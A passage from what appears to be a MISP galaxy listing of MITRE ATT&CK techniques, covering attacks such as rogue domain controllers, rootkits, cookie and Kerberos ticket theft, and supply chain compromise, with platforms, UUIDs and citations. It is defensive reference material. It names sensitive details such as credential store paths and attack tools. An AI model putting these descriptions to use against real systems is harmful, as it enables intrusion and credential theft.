platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Replication Through Removable Media

Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.

Mobile devices may also be used to infect PCs with malware if connected via USB.[Exploiting Smartphone USB ] This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.[Windows Malware Infecting Android][iPhone Charging Cable Hack] For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).

Internal MISP references

UUID 6a7ab25e-49ed-4cd3-b199-5d80b728b416 which can be used as unique global reference for Replication Through Removable Media in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Resource Hijacking

Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.

One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.[Kaspersky Lazarus Under The Hood Blog 2017] Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.[CloudSploit - Unused AWS Regions] Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.[Unit 42 Hildegard Malware][Trend Micro Exposed Docker APIs]

Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.[Trend Micro War of Crypto Miners]

Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate Network Denial of Service campaigns and/or to seed malicious torrents.[GoBotKR] Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.[Sysdig Proxyjacking]

Internal MISP references

UUID d10c4a15-aeaa-4630-a7a3-3373c89a584f which can be used as unique global reference for Resource Hijacking in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Rogue Domain Controller

Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. [DCShadow Blog] Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. [Adsecurity Mimikatz Guide]

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). [DCShadow Blog] The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. [DCShadow Blog]

Internal MISP references

UUID c5eb5b88-6c62-4900-9b14-c4d67d420002 which can be used as unique global reference for Rogue Domain Controller in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Rootkit

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. [Symantec Windows Rootkits]

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware. [Wikipedia Rootkit] Rootkits have been seen for Windows, Linux, and Mac OS X systems. [CrowdStrike Linux Rootkit] [BlackHat Mac OSX Rootkit]

Internal MISP references

UUID cf2b56f6-3ebd-48ec-b9d9-835397acef89 which can be used as unique global reference for Rootkit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Scheduled Task/Job

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.[TechNet Task Scheduler Security]

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to System Binary Proxy Execution, adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.[ProofPoint Serpent]

Internal MISP references

UUID 0baf02af-ffaa-403f-9f0d-da51f463a1d8 which can be used as unique global reference for Scheduled Task/Job in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Scheduled Transfer

Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.

When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel or Exfiltration Over Alternative Protocol.

Internal MISP references

UUID ea0557cd-94bc-48cf-9c3b-293c40986464 which can be used as unique global reference for Scheduled Transfer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Screen Capture

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.[CopyFromScreen .NET][Antiquated Mac Malware]

Internal MISP references

UUID 4462ce9d-0a5a-427d-8160-7b307b50cfbd which can be used as unique global reference for Screen Capture in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Search Closed Sources

Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.[D3Secutrity CTI Feeds] Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.[ZDNET Selling Data]

Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Valid Accounts).

Internal MISP references

UUID 40e4133b-28c2-4da7-9a6a-7392ae87f1da which can be used as unique global reference for Search Closed Sources in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Search Open Technical Databases

Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.[WHOIS][DNS Dumpster][Circl Passive DNS][Medium SSL Cert][SSLShopper Lookup][DigitalShadows CDN][Shodan]

Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).

Internal MISP references

UUID cf79ad1b-a82b-486b-88ad-e93bfc1c7439 which can be used as unique global reference for Search Open Technical Databases in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Search Open Websites/Domains

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.[Cyware Social Media][SecurityTrails Google Hacking][ExploitDB GoogleHacking]

Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: External Remote Services or Phishing).

Internal MISP references

UUID f2d216e3-43d6-4a2e-aa5b-d6be78d018b6 which can be used as unique global reference for Search Open Websites/Domains in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Search Victim-Owned Websites

Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: Email Addresses). These sites may also have details highlighting business operations and relationships.[Comparitech Leak]

Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Trusted Relationship or Phishing).

Internal MISP references

UUID c55c0462-d59f-4bd8-9728-05cf711917b0 which can be used as unique global reference for Search Victim-Owned Websites in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Serverless Execution

Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers.

Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. Resource Hijacking).[Cado Security Denonia] Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the IAM:PassRole permission in AWS or the iam.serviceAccounts.actAs permission in Google Cloud to add Additional Cloud Roles to a serverless cloud function, which may then be able to perform actions the original user cannot.[Rhino Security Labs AWS Privilege Escalation][Rhingo Security Labs GCP Privilege Escalation]

Serverless functions can also be invoked in response to cloud events (i.e. Event Triggered Execution), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds Additional Cloud Credentials to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.[Backdooring an AWS account] Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.[Varonis Power Automate Data Exfiltration][Microsoft DART Case Report 001]

Internal MISP references

UUID d9edb609-2ca3-43d1-9c4d-c09a2856230f which can be used as unique global reference for Serverless Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Office 365', 'SaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Server Software Component

Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.[volexity_0day_sophos_FW]

Internal MISP references

UUID 03fb32fa-cdee-4e94-ae3e-16b51a10ba9c which can be used as unique global reference for Server Software Component in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Service Stop

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.[Talos Olympic Destroyer 2018][Novetta Blockbuster]

Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible [Novetta Blockbuster]. In some cases, adversaries may stop or disable many or all services to render systems unusable.[Talos Olympic Destroyer 2018] Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.[SecureWorks WannaCry Analysis]

Internal MISP references

UUID e27c5756-f43e-424f-af62-b21e8b304e5d which can be used as unique global reference for Service Stop in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Shared Modules

Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API).

Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.

The Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in dlfcn.h in functions such as dlopen and dlsym. Although macOS can execute .so files, common practice uses .dylib files.[Apple Dev Dynamic Libraries][Linux Shared Libraries][RotaJakiro 2021 netlab360 analysis][Unit42 OceanLotus 2017]

The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like LoadLibrary at run time.[Microsoft DLL]

Internal MISP references

UUID 8941d1f4-d80c-4aaa-821a-a059c2a0f854 which can be used as unique global reference for Shared Modules in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Software Deployment Tools

Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager.

Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

SaaS-based configuration management services may allow for broad Cloud Administration Command on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.[SpecterOps Lateral Movement from Azure to On-Prem AD 2020] Such services may also utilize Web Protocols to communicate back to adversary owned infrastructure.[Mitiga Security Advisory: SSM Agent as Remote Access Trojan]

Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation]

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.

Internal MISP references

UUID 1bcf9fb5-6848-44d9-b394-ffbd3c357058 which can be used as unique global reference for Software Deployment Tools in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Software Discovery

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Such software may be deployed widely across the environment for configuration management or security reasons, such as Software Deployment Tools, and may allow adversaries broad access to infect devices or move laterally.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation.

Internal MISP references

UUID e9bff6ff-3142-4910-8f67-19b868912602 which can be used as unique global reference for Software Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Stage Capabilities

Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed (Develop Capabilities) or obtained (Obtain Capabilities) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.[Volexity Ocean Lotus November 2020][Dragos Heroku Watering Hole][Malwarebytes Heroku Skimmers][Netskope GCP Redirection][Netskope Cloud Phishing]

Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):

Internal MISP references

UUID ec2a76e6-3530-43e1-9e80-686e4b214ac8 which can be used as unique global reference for Stage Capabilities in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Steal Application Access Token

Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019] Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.[Kubernetes Service Accounts] Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.[Cider Security Top 10 CICD Security Risks] If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.

Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.[Microsoft Identity Platform Protocols May 2019][Microsoft - OAuth Code Authorization flow - June 2019] An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.

Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.[Amnesty OAuth Phishing Attacks, August 2019][Trend Micro Pawn Storm OAuth 2017] The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.[Microsoft - Azure AD App Registration - May 2019] Then, they can send a Spearphishing Link to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through Application Access Token.[Microsoft - Azure AD Identity Tokens - Aug 2019]

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens[Auth0 Understanding Refresh Tokens], allowing them to obtain new access tokens without prompting the user.

Internal MISP references

UUID f78f2c87-626a-468f-93a5-31b61be17727 which can be used as unique global reference for Steal Application Access Token in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'Office 365', 'SaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Steal or Forge Authentication Certificates

Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.[O365 Blog Azure AD Device IDs][Microsoft AD CS Overview]

Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)[APT29 Deep Look at Credential Roaming], misplaced certificate files (i.e. Unsecured Credentials), or directly from the Windows certificate store via various crypto APIs.[SpecterOps Certified Pre Owned][GitHub CertStealer][GitHub GhostPack Certificates] With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.[Medium Certified Pre Owned]

Abusing certificates for authentication credentials may enable other behaviors such as Lateral Movement. Certificate-related misconfigurations may also enable opportunities for Privilege Escalation, by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable Persistence via stealing or forging certificates that can be used as Valid Accounts for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.

Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish Persistence by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).[Medium Certified Pre Owned] Adversaries may also target certificates and related services in order to access other forms of credentials, such as Golden Ticket ticket-granting tickets (TGT) or NTLM plaintext.[Medium Certified Pre Owned]

Internal MISP references

UUID b8c27b52-3e73-448d-8a7c-3e814c8e3889 which can be used as unique global reference for Steal or Forge Authentication Certificates in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Steal or Forge Kerberos Tickets

Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable Pass the Ticket. Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).[ADSecurity Kerberos Ring Decoder] Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.

On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.[Microsoft Klist]

Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.[MIT ccache] On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for Pass the Ticket. The ccache file may also be converted into a Windows format using tools such as Kekeo.[Linux Kerberos Tickets][Brining MimiKatz to Unix][Kekeo]

Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.[SpectorOps Bifrost Kerberos macOS 2019][macOS kerberos framework MIT]

Internal MISP references

UUID 0fef0394-7cf6-4797-8a5e-1cbfd31ee501 which can be used as unique global reference for Steal or Forge Kerberos Tickets in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.[Pass The Cookie]

There are several examples of malware targeting cookies from web browsers on the local system.[Kaspersky TajMahal April 2019][Unit 42 Mac Crypto Cookies January 2019] Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on User Execution by tricking victims into running malicious JavaScript in their browser.[Talos Roblox Scam 2023][Krebs Discord Bookmarks 2023]

There are also open source frameworks such as Evilginx2 and Muraena that can gather session cookies through a malicious proxy (e.g., Adversary-in-the-Middle) that can be set up by an adversary and used in phishing campaigns.[Github evilginx2][GitHub Mauraena]

After an adversary acquires a valid cookie, they can then perform a Web Session Cookie technique to login to the corresponding web application.

Internal MISP references

UUID 17f9e46d-4e3d-4491-a0d9-0cc042531d6e which can be used as unique global reference for Steal Web Session Cookie in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Subvert Trust Controls

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct File and Directory Permissions Modification or Modify Registry in support of subverting these controls.[SpectorOps Subverting Trust Sept 2017] Adversaries may also create or steal code signing certificates to acquire trust on target systems.[Securelist Digital Certificates][Symantec Digital Certificates]

Internal MISP references

UUID 73a8b954-93fe-466c-b73d-bd35bb08c3e7 which can be used as unique global reference for Subvert Trust Controls in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Supply Chain Compromise

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

  • Manipulation of development tools
  • Manipulation of a development environment
  • Manipulation of source code repositories (public or private)
  • Manipulation of source code in open-source dependencies
  • Manipulation of software update/distribution mechanisms
  • Compromised/infected system images (multiple cases of removable media infected at the factory)[IBM Storwize][Schneider Electric USB Malware]
  • Replacement of legitimate software with modified versions
  • Sales of modified/counterfeit products to legitimate distributors
  • Shipment interdiction

While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.[Avast CCleaner3 2018][Microsoft Dofoil 2018][Command Five SK 2011] Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.[Symantec Elderwood Sept 2012][Avast CCleaner3 2018][Command Five SK 2011] Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.[Trendmicro NPM Compromise]

Internal MISP references

UUID b72c8a96-5e03-40c2-ac0c-f77b73fe493f which can be used as unique global reference for Supply Chain Compromise in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.[LOLBAS Project] Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.[split man page][GTFO split]

Internal MISP references

UUID 4060ad55-7ff1-4127-acad-808b2bc77655 which can be used as unique global reference for System Binary Proxy Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Information Discovery

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Tools such as Systeminfo can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a Network Device CLI on network devices to gather detailed system information (e.g. show version).[US-CERT-TA18-106A] System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.[OSX.FairyTale][20 macOS Common Tools and Techniques]

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.[Amazon Describe Instance][Google Instances Resource][Microsoft Virutal Machine API]

Internal MISP references

UUID a2961a00-450e-45a5-b293-f699d9f3b4ea which can be used as unique global reference for System Information Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Location Discovery

Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from System Location Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.[FBI Ragnar Locker 2020][Sophos Geolocation 2016][Bleepingcomputer RAT malware 2020] Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.[FBI Ragnar Locker 2020] In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.[AWS Instance Identity Documents][Microsoft Azure Instance Metadata 2021]

Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.[Securelist Trasparent Tribe 2020][Sophos Geolocation 2016]

Internal MISP references

UUID 90e6a093-3e87-4d74-8b68-38c7d7e5e93c which can be used as unique global reference for System Location Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Network Configuration Discovery

